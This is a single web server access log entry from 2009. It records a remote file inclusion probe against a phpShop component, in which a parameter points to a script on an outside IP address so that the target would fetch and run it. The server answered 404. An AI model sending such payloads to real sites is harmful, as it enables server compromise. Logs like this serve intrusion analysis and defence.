174.143.3.188 - - [26/Oct/2009:02:10:54 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.galf.org"
